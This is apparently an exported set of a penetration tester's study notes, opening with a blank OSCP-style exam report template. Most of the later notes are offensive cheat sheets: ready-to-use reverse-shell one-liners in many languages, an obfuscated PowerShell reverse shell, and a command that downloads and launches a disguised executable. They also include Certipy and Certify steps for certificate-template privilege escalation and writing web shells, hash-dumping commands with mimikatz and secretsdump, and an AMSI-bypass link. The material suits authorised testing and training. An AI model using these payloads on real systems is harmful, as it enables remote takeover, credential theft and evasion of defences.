I was tasked with performing an internal penetration test towards Offensive Security Exam.
An internal penetration test is a dedicated attack against internally connected systems.
The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Security’s internal exam systems – the THINC.local domain.
My overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.

When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Security’s network.
When performing the attacks, I was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations.
During the testing, I had administrative level access to multiple systems.
All systems were successfully exploited and access granted.
These systems as well as a brief description on how access was obtained are listed below:

- 192.168.xx.xx (hostname) - Name of initial exploit
- 192.168.xx.xx (hostname) - Name of initial exploit
- 192.168.xx.xx (hostname) - Name of initial exploit
- 192.168.xx.xx (hostname) - Name of initial exploit
- 192.168.xx.xx (hostname) - BOF

## Recommendations

I recommend patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future.
One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.

<div style="page-break-after: always;"></div>

# Methodologies

I utilized a widely adopted approach to performing penetration testing that is effective in testing how well the Offensive Security Exam environments is secured.
Below is a breakout of how I was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.

## Information Gathering

The information gathering portion of a penetration test focuses on identifying the scope of the penetration test.
During this penetration test, I was tasked with exploiting the exam network.
The specific IP addresses were:

**Exam Network**

- 192.168.
- 192.168.
- 192.168.
- 192.168.
- 192.168.

## Penetration

The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems.
During this penetration test, I was able to successfully gain access to **X** out of the **X** systems.

<div style="page-break-after: always;"></div>

### System IP: 192.168.x.x

#### Service Enumeration

The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems.
This is valuable for an attacker as it provides detailed information on potential attack vectors into a system.
Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test.
In some cases, some ports may not be listed.

Server IP Address | Ports Open
------------------|----------------------------------------
192.168.x.x       | **TCP**: 80,443
**UDP**: 1434,161

**Nmap Scan Results:**

*Initial Shell Vulnerability Exploited*

*Additional info about where the initial shell was acquired from*

**Vulnerability Explanation:**

**Vulnerability Fix:**

**Severity:**

**Proof of Concept Code Here:**

**Local.txt Proof Screenshot**

**Local.txt Contents**

#### Privilege Escalation

*Additional Priv Esc info*

**Vulnerability Exploited:**

**Vulnerability Explanation:**

**Vulnerability Fix:**

**Severity:**

**Exploit Code:**

**Proof Screenshot Here:**

**Proof.txt Contents:**

<div style="page-break-after: always;"></div>

### System IP: 192.168.x.x

#### Service Enumeration

Server IP Address | Ports Open
------------------|----------------------------------------
192.168.x.x       | **TCP**: 80,443
**UDP**: 1434,161

**Nmap Scan Results:**

*Initial Shell Vulnerability Exploited*

*Additional info about where the initial shell was acquired from*

**Vulnerability Explanation:**

**Vulnerability Fix:**

**Severity:**

**Proof of Concept Code Here:**

**Local.txt Proof Screenshot**

**Local.txt Contents**

#### Privilege Escalation

*Additional Priv Esc info*

**Vulnerability Exploited:**

**Vulnerability Explanation:**

**Vulnerability Fix:**

**Severity:**

**Exploit Code:**

**Proof Screenshot Here:**

**Proof.txt Contents:**

<div style="page-break-after: always;"></div>

### System IP: 192.168.x.x

#### Service Enumeration

Server IP Address | Ports Open
------------------|----------------------------------------
192.168.x.x       | **TCP**: 80,443
**UDP**: 1434,161

**Nmap Scan Results:**

*Initial Shell Vulnerability Exploited*

*Additional info about where the initial shell was acquired from*

**Vulnerability Explanation:**

**Vulnerability Fix:**

**Severity:**

**Proof of Concept Code Here:**

**Local.txt Proof Screenshot**

**Local.txt Contents**

#### Privilege Escalation

*Additional Priv Esc info*

**Vulnerability Exploited:**

**Vulnerability Explanation:**

**Vulnerability Fix:**

**Severity:**

**Exploit Code:**

**Proof Screenshot Here:**

**Proof.txt Contents:**

<div style="page-break-after: always;"></div>

### System IP: 192.168.x.x

#### Service Enumeration

Server IP Address | Ports Open
------------------|----------------------------------------
192.168.x.x       | **TCP**: 80,443
**UDP**: 1434,161

**Nmap Scan Results:**

*Initial Shell Vulnerability Exploited*

*Additional info about where the initial shell was acquired from*

**Vulnerability Explanation:**

**Vulnerability Fix:**

**Severity:**

**Proof of Concept Code Here:**

**Local.txt Proof Screenshot**

**Local.txt Contents**

#### Privilege Escalation

*Additional Priv Esc info*

**Vulnerability Exploited:**

**Vulnerability Explanation:**

**Vulnerability Fix:**

**Severity:**

**Exploit Code:**

**Proof Screenshot Here:**

**Proof.txt Contents:**

<div style="page-break-after: always;"></div>

### System IP: 192.168.x.x

**Vulnerability Exploited: **

**Proof Screenshot:**

<div style="page-break-after: always;"></div>

## Maintaining Access

Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable.
The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again.
Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.

## House Cleaning

The house cleaning portions of the assessment ensures that remnants of the penetration test are removed.
Often fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road.
Ensuring that we are meticulous and no remnants of our penetration test are left over is important.

After collecting trophies from the exam network was completed, Alec removed all user accounts and passwords as well as the Meterpreter services installed on the system.
Offensive Security should not have to remove any user accounts or services from the system.

<div style="page-break-after: always;"></div>


# Additional Items

## Appendix - Proof and Local Contents:

IP (Hostname) | Local.txt Contents | Proof.txt Contents
--------------|--------------------|-------------------
192.168.x.x   | hash_here          | hash_here
192.168.x.x   | hash_here          | hash_here
192.168.x.x   | hash_here          | hash_here
192.168.x.x   | hash_here          | hash_here
192.168.x.x   | hash_here          | hash_here

## Appendix - Metasploit/Meterpreter Usage

For the exam, I used my Metasploit/Meterpreter allowance on the following machine: `192.168.x.x`

<br>

<center>

![310x310.png](Pentest_Template_Master_4.0/_resources/310x310.png) 

</center>




id: b28686c45c354195b2a6fabad74b7685
parent_id: 729926ecd3684d6fa271e50fceb6dad9
created_time: 2024-08-01T20:20:33.160Z
updated_time: 2024-08-02T04:11:29.928Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132966
user_created_time: 2024-08-01T20:20:33.160Z
user_updated_time: 2024-08-02T04:11:29.928Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1b9f3e4b393d44113bbcd6de18cd06dd0.md000644 0000001651 14666154175013036 0ustar00000000 000000 General Notes Windows

# Command Line: 

- systeminfo

# PowerShell

- Get-ComputerInfo
- Get-ComputerInfo -Property "*version"
- Get-ComputerInfo -Property "*version", "os*" | select WindowsCurrentVersion, WindowsVersion, OsName, OsBuildNumber, OsHotFixes, OsArchitecture | fl

id: b9f3e4b393d44113bbcd6de18cd06dd0
parent_id: 8f6442e342044bd785c48bacc2e7658e
created_time: 2024-08-01T20:20:33.160Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132765
user_created_time: 2024-08-01T20:20:33.160Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1bb869812e9df4833aa77d025b328d7fc.md000644 0000002365 14666154175012650 0ustar00000000 000000 General Notes Linux

## Enumerating Linux Users

- cat /etc/passwd
- less etc/passwd
- getent passwd | awk -F: '{ print $1}'
- cut -d: -f1 /etc/passwd
- awk –F: ‘{ print $1}’ /etc/passwd
- getent parrwd {1000..6000}

## Enumerating Users Permissions

- id
- id -nG
- getent group <group-name>

## Enumerating Linux Groups

- groups
- less /etc/group
- getent groups
- getent group | awk -F: '{ print $1}'

## Creating a user in linux: 

- adduser afsimmons # (alt, use full path: /usr/sbin/adduser afsimmons)
- passwd afsimmons
- useradd -G {group-name} afsimmons

- /usr/sbin/usermod -aG sudo afsimmons

id: bb869812e9df4833aa77d025b328d7fc
parent_id: 3d952c01f8714d48887a2785a84c3fbb
created_time: 2024-08-01T20:20:33.160Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132780
user_created_time: 2024-08-01T20:20:33.160Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1bbf245e8844f4208bae29410303b7346.md000644 0000005554 14666154175012407 0ustar00000000 000000 8. ESC7 Certificate Templates

# General Overview

Certificate Authorities (CAs) are granted specific permissions to manage and secure operations. The ManageCA permission provides administrative control, allowing modifications to persistent configuration settings, such as enabling the EDITF_ATTRIBUTESUBJECTALTNAME2 flag. Conversely, the ManageCertificates permission permits the approval of pending certificate requests, which can override the need for manager approval.

# Abusing ESC7 Certificate Templates

## Scenario 1: 
If we find a user that has the Manage CA permission, we can add an Officer. This will grant us the Manage Certificates permission: 

## Certipy:
- certipy-ad ca -ca 'Vulnerable CA' -add-officer  -username afsimmons@megacorpone.com -password Spawn123!
- certipy-ad -ca -ca 'Vulnerable CA'  -enable-template SubCA -username afsimmons@megacorpone.com -password Spawn123!
If we have fulfilled the prerequisites for this attack, we can start by requesting a certificate based on the SubCA template:

- certipy-ad req -username afsimmons@megacorpone.com -password Spawn123! -ca corp-DC-CA -target ca.megacorpone.com -template SubCA -upn xadministrator@megacorpone.com
- certipy-ad ca -ca 'corp-DC-CA' -issue-request 785 -username afsimmons@megacorpone.com -password Spawn123!
- certipy-ad req -username afsimmons@megacorpone.com -password Spawn123! -ca corp-DC-CA -target ca.megacorpone.com -retrieve 785
## Certify
- Certify.exe setconfig /enablesan /restart
- Certify.exe request /template:corp-DC-CA /altname:xadministrator
- Certify.exe issue /id:[REQUEST ID]
- To disable: Certify.exe setconfig /removeapproval /restart
Alternative Technique:
- Get the current CDP list. Useful to find remote writable shares:
	Certify.exe writefile /ca:SERVER\ca-name /readonly

- Write an aspx shell to a local web directory:
	Certify.exe writefile /ca:SERVER\ca-name /path:C:\Windows\SystemData\CES\CA-Name\shell.aspx /input:C:\Local\Path\shell.aspx

- Write the default asp shell to a local web directory:
	Certify.exe writefile /ca:SERVER\ca-name /path:c:\\inetpub\\wwwroot\\shell.aspx
- Write a php shell to a remote web directory:
	Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\\share\\shell.php /input:C:\\Local\\path\\shell.php


id: bbf245e8844f4208bae29410303b7346
parent_id: e5db134a7ed6458393dd8757b82ddab1
created_time: 2024-08-30T05:12:25.007Z
updated_time: 2024-08-30T18:28:31.748Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132281
user_created_time: 2024-08-30T05:12:25.007Z
user_updated_time: 2024-08-30T18:28:31.748Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1c48a7ecde9e143dbb9f968bb2a64a937.md000644 0000000620 14666154175013063 0ustar00000000 000000 5. Exploitation Notes

id: c48a7ecde9e143dbb9f968bb2a64a937
created_time: 2024-09-04T21:42:12.430Z
updated_time: 2024-09-04T21:42:46.582Z
user_created_time: 2024-09-04T21:42:12.430Z
user_updated_time: 2024-09-04T21:42:46.582Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 209cdc03c015406883ec99e460d27e45
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 2c8f8a25244cc4dfbbabbf0d9aeabc5f4.md000644 0000000622 14666154175013412 0ustar00000000 000000 6. Exploitation Targets

id: c8f8a25244cc4dfbbabbf0d9aeabc5f4
created_time: 2024-09-04T21:42:12.496Z
updated_time: 2024-09-04T21:42:12.496Z
user_created_time: 2024-09-04T21:42:12.496Z
user_updated_time: 2024-09-04T21:42:12.496Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 209cdc03c015406883ec99e460d27e45
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 2d2ccba144d74485e9a48ff38560fce6a.md000644 0000002404 14666154175012776 0ustar00000000 000000 General Notes Linux

## What does the targets network look like:

- /sbin/ifconfig -a
- /sbin/ip addr
- cat /etc/network/interfaces
- cat /etc/sysconfig/network
- ip addr show

## Network configuration Settings: 

- cat /etc/resolv.conf
- cat /etc/sysconfig/network
- cat /etc/networks
- iptables -L
- hostname
- dnsdomainname

## List all current connections

- lsof -i
- lsof -i :80
- grep 80 /etc/services
- netstat -antup
- netstat -antpx
- netstat -tulpn
- ss -ntlp
- chkconfig --list
- chkconfig --list | grep 3:on

## Check the routes: 

- arp -e
- route
- route -n 
- /sbin/route -nee
- ip route list

References: 



id: d2ccba144d74485e9a48ff38560fce6a
parent_id: 323971dda5ee4d3bb6b431f59f68ca7b
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-08-01T20:34:09.864Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132680
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-08-01T20:34:09.864Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1d3235f796687468f8a710382eab43098.md000644 0000014447 14666154175012306 0ustar00000000 000000 1. General Notes

## Pre-requisites for running exploits

- Check the version of the operating system.
- Check the software version.
- Check if there is exploit for it (Searchsploit, ExploitDB, Google, etc).
- If you have an exploit, is there a Metasploit Module for it?


## Default Credentials

- https://cirt.net/passwords
- https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials

## Reverse Shells

## Online Reverse Shell Generators:
- https://www.revshells.com/
- https://shellgenerator.github.io/

## Hosting Revshells Locally: 
1. git clone https://github.com/0dayCTF/reverse-shell-generator
2. docker build -t reverse_shell_generator .
3. docker run -d -p 80:80 reverse_shell_generator

## Other Reverse Shell:

Bash: 

- bash -i >& /dev/tcp/IP ADDRESS/8080 0>&1

Perl:

```
perl -e 'use Socket;$i="IP ADDRESS";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

Python: 

- python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP ADDRESS",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

IPv6: 

- python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' 

Ruby:

- ruby -rsocket -e'f=TCPSocket.open("IP ADDRESS",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
- ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'


PHP:

Pentest Monkey Reverse Shell for PHP:
In Kali: 

/usr/share/webshells/php/php-reverse-shell.php

Link: http://pentestmonkey.net/tools/web-shells/php-reverse-shell

- php -r '$sock=fsockopen("IP ADDRESS",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Windows Powershell Oneliner: 

Note: To change the IP Address replace the number values in Check.for.Callback.Connection. To change the port pick your own numeric values to equal the number you want your shell to callback to you. 

```
# Offsec-callback-v3
$ezYSZf = & ((Get-Command "New-ScheduledJobOption").name[0,1,2,3,14,15,13,1,5,18] -join '') ([string]::join('', ( (83,121,115,116,101,109,46,78,101,116,46,83,111,99,107,101,116,115,46,84,67,80,67,108,105,101,110,116) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})("Check.for.Callback.Connection".Replace("Check",127).Replace("For",0+255-255).Replace("Callback", 0+234-234).Replace("Connection",0+0+0+1),(443*2-443));
$VXm = $ezYSZf.GetStream();
# checkin to target
[byte[]]$0bLXRjHKPvWQUhq = (10023-10023)..(13107*5)|<##>%{$_}<##>|%{0};
while(($i = $VXm.Read($0bLXRjHKPvWQUhq, 0, $0bLXRjHKPvWQUhq.Length)) -ne 0)
{;
$Tc9dYRLI5 = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($0bLXRjHKPvWQUhq,0, $i);
$sendback = (iex $Tc9dYRLI5 2>&1 |<##>%{$_}<##>| Out-String );
# AND
$YzlnHIRT = $sendback + $(([string]::join('', ( (80,83,32) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})) + (pwd).Path + $(([string]::join('', ( (62,62,32) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_}));
$sdfghjklASDA222 = ([text.encoding]::ASCII).GetBytes($YzlnHIRT);
$VXm.Write($sdfghjklASDA222,0,$sdfghjklASDA222.Length);$VXm.Flush()
};
Start-Sleep -Seconds 5
# checkout of target
$ezYSZf.Close()
```

Powershell ISO Oneliner:
```
powershell -c "(New-Object System.Net.WebClient).DownloadFile('https://172.21.1.0/windows.iso', 'C:\Windows\Tasks\windows.iso'); $MountedImage = Mount-DiskImage -ImagePath 'C:\Windows\Tasks\windows.iso' -PassThru; Start-Process -FilePath ($MountedImage | Get-Volume).DriveLetter + ':\msupdate.exe'; dismount-DiskImage -ImagePath $MountedImage.ImagePath"
```

Linux Powershell Oneliner:

```
$ezYSZf = & (("New-ScheduledJobOption")[0,1,2,3,14,15,13,1,5,18] -join '') ([string]::join('', ( (83,121,115,116,101,109,46,78,101,116,46,83,111,99,107,101,116,115,46,84,67,80,67,108,105,101,110,116) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})("Stay.Off.Ronins.Lawn".Replace("Stay",127).Replace("Off",0+255-255).Replace("Ronins", 0+1-1).Replace("Lawn",0+0+0+1),(443*2-443));
$VXm = $ezYSZf.GetStream();
[byte[]]$0bLXRjHKPvWQUhq = (10023-10023)..(13107*5)|<##>%{$_}<##>|%{0};
while(($i = $VXm.Read($0bLXRjHKPvWQUhq, 0, $0bLXRjHKPvWQUhq.Length)) -ne 0)
{;
$Tc9dYRLI5 = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($0bLXRjHKPvWQUhq,0, $i);
$sendback = (iex $Tc9dYRLI5 2>&1 |<##>%{$_}<##>| Out-String );
$YzlnHIRT = $sendback + $(([string]::join('', ( (80,83,32) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})) + (pwd).Path + $(([string]::join('', ( (62,62,32) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_}));
$sdfghjklASDA222 = ([text.encoding]::ASCII).GetBytes($YzlnHIRT);
$VXm.Write($sdfghjklASDA222,0,$sdfghjklASDA222.Length);$VXm.Flush()
};
$ezYSZf.Close()
```

Golang: 

- echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","IP ADDRESS:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

AWK: 

- awk 'BEGIN {s = "/inet/tcp/0/IP ADDRESS/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null


Other Reverse Shell: 
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md


## Other Resources 

- Amsi-Bypass-Powershell: https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell 







id: d3235f796687468f8a710382eab43098
parent_id: c48a7ecde9e143dbb9f968bb2a64a937
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-09-04T04:50:52.347Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132438
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-09-04T04:50:52.347Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1d45ea6502e2f408cb28066e488062685.md000644 0000003547 14666154175012345 0ustar00000000 000000 Dumping Hashes

# Windows: 

## Meterpreter HashDump

- run post/windows/gather/hashdump

## Meterpreter Mimikatz (Post Exploitation must be executed from SYSTEM privileges)

- load mimikatz
- creds_all

DUMP LSA SECRETS
- lsadump.py sys_backup.hiv sec_backup.hiv

DUMP LOCAL PASSWORD HASHES

- pwdump.py sys_backup.hiv sec_backup.hiv

## reg.exe 

- reg save HKLM\sam sam
- reg save HKLM\system system

## samdump2

- samdump2 SYSTEM SAM > hashes.db

## Impacket Tools: 

- secretsdump.py -ntds ~/Extract/ntds.dit -system ~/Extract/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-hashes

If you have the NTDS.dit file and the SYSTEM hive: 

- secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

# Linux

Requires Root Privileges

- cat /etc/shadow

- cp /etc/passwd and shadow
- unshadow passwd shadow 

#  OSX

10.5-10.7

- dscl localhost -read /Search/Users/<username>|grep GeneratedUID|cut -c15-cat
/var/db/shadow/hash/<GUID> | cut -c169-216 > osx_hash.txt

10.8-10.12

- sudo defaults read /var/db/dslocal/nodes/Default/users/<username>.plist ShadowHashData|tr -dc ‘
0-9a-f’|xxd -p -r|plutil -convert xml1 - -o -

# Other Resources: 

- Lsassy: https://github.com/Hackndo/lsassy

id: d45ea6502e2f408cb28066e488062685
parent_id: dcb4d790b01144b7ada27167784dae15
created_time: 2024-08-01T20:20:33.160Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132904
user_created_time: 2024-08-01T20:20:33.160Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1d92993d8d8b245cab3b68c42f6612eae.md000644 0000004400 14666154175012715 0ustar00000000 000000 2. Enumerating for vulnerable templates


- netexec: 
	- `netexec ldap megacorpone.com -u username -p password -M adcs`
- ldapsearch: 
	- `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
- certipy: 
	 - certipy-ad find -u 'afsimmons@megacorpone.com' -p 'password' -dc-ip dc_ip -vulnerable -enabled
	 - certipy-ad find -u 'afsimmons@megacorpone.com' -p 'password' -dc-ip 'dc_ip' -old-bloodhound
	 - certipy-ad find -u 'afsimmons@megacorpone.com' -p 'password' -dc-ip 'dc_ip' -bloodhound
	 
- certutil: 
	- `certutil.exe -config - -ping`, `certutil -dump
- certi:
	- Source: https://github.com/zer1t0/certi
	- python certi.py list 'megacorpone.com/afsimmons' -k -n --dc-ip 172.21.0.0 --vuln --enable | grep "CERTIFICATE" -B 3
	- python certi.py list 'megacorpone.com/afsimmons' -k -n --dc-ip 172.21.0.0 --class ca
- BloodyAD
	- python bloodyAD.py -u afsimmons -p 'Spawn123!' --host 172.21.1.1 -d megacorpone.com get search --base 'CN=Configuration,DC=megacorpone,DC=local' --filter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))'




## References: 

- https://github.com/ly4k/Certipy
- https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb
- https://www.netexec.wiki/ldap-protocol/exploit-esc8-adcs
- https://github.com/CravateRouge/bloodyAD?tab=readme-ov-file



id: d92993d8d8b245cab3b68c42f6612eae
parent_id: e5db134a7ed6458393dd8757b82ddab1
created_time: 2024-08-13T19:12:51.820Z
updated_time: 2024-08-28T02:42:34.880Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132227
user_created_time: 2024-08-13T19:12:51.820Z
user_updated_time: 2024-08-28T02:42:34.880Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1db7672845ddf43698ed260b6549ccd82.md000644 0000003415 14666154175012577 0ustar00000000 000000 Masscan

## Scanning targets
- masscan 172.21.10.0
- masscan 172.21.10.0/24 172.21.0.0/16
- masscan 172.21.10.0/24 --excludeFile <File>
- masscan 172.21.10.0/24 --exclude 172.21.10.254

## Scanning for services: 
- masscan  172.21.10.1 -p 80
- masscan  172.21.10.1 -p 0-65535
- masscan  172.21.10.1 -p 80,443
- masscan 172.21.10.0/24 -p 0-65535 --rate 1000000 --open-only --http-user-agent \
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\
 -oL "output.txt"
# UDP Scan
- masscan 172.21.10.1 -pU 53

## Report only open ports
masscan 10.0.0.1 --open-only

# Other Options
## Offline Mode (Reviews how fast the program runs without the transmit overhead)
- masscan 0.0.0.0/24 --offline

## Obtaining Service banners:
- masscan 172.21.10.1 --banners

## Set masscan to use a source ip
masscan 10.0.0.1 --source-ip 192.168.1.200

## Change the default user agent
masscan 10.0.0.1 --http-user-agent <user-agent>

## Save sent packet in PCAP
masscan 10.0.0.1 --pcap <filename>

# References:

- https://github.com/robertdavidgraham/masscan
- https://danielmiessler.com/study/masscan/



id: db7672845ddf43698ed260b6549ccd82
parent_id: 008bf10b237d494db05d2270f21864df
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132027
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1dc3d949dc00c4f72941f714250eab073.md000644 0000001450 14666154175012536 0ustar00000000 000000 Password Loot

# Any passwords or hashs that you find should be documented here. Include steps on how you were able to obtain them from your target:

id: dc3d949dc00c4f72941f714250eab073
parent_id: 9ce7a889dbb846f7879f6081c44a8d3a
created_time: 2024-08-01T20:20:33.160Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132926
user_created_time: 2024-08-01T20:20:33.160Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1dc4999da411f436a9521e0e1e18a8bc6.md000644 0000007625 14666154175012641 0ustar00000000 000000 3. ESC1 Certificate Templates

# General Overview: 

A certificate template with the ESC1 vulnerability allows low-privileged users to enroll and request certificates on behalf of any domain object they specify. This means that any user with enrollment rights can request a certificate for a high-privilege account, such as a domain administrator.

To exploit ESC1, the certificate template must meet specific criteria:

- **Enrollment Rights**: The user’s group must have enrollment rights, allowing them to request a new certificate from the Certificate Authority (CA).
- **Extended Key Usage: Client Authentication**: The template must support client authentication, enabling the generated certificate to authenticate to domain computers.
- **Enrollee Supplies Subject**: This option must be set to True, allowing the user to supply the SAN (Subject Alternative Name).
- **No Manager Approval Required**: The certificate request should be auto-approved without needing manager approval.

# Abusing ESC1 Certificates

